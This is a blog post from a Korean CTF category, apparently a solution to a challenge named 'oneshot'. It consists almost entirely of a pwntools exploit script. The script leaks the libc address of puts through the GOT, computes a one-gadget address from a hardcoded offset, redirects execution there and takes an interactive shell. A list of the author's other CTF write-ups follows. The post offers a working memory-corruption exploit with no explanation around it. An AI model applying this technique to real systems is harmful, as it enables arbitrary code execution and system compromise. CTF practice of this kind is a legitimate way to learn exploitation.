from pwn import *

r = process("./oneshot")
elf = ELF("./oneshot")

puts_got = elf.got['puts']

r.recv()
payload = str(puts_got)
r.sendline(payload)

r.recvuntil("Value: ")
libc_puts = r.recvuntil("\x0a").replace("\x0a", "")
libc_puts = int(libc_puts, 16)
oneshot = libc_puts - 0x2a47a
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("oneshot = {}".format(hex(oneshot)))

r.recvuntil("Jump location?")
r.sendline(str(oneshot))

r.interactive()

'CTF' 카테고리의 다른 글

codegate2019 aeiou  (0) 2019.02.23
CSAW2016 tutorial  (0) 2019.02.01
QIWICTF 2016 pwn200  (0) 2019.01.23
SEC-T CTF PingPong  (0) 2018.09.16
BCTF 2016 bcloud  (0) 2018.08.24

+ Recent posts

티스토리툴바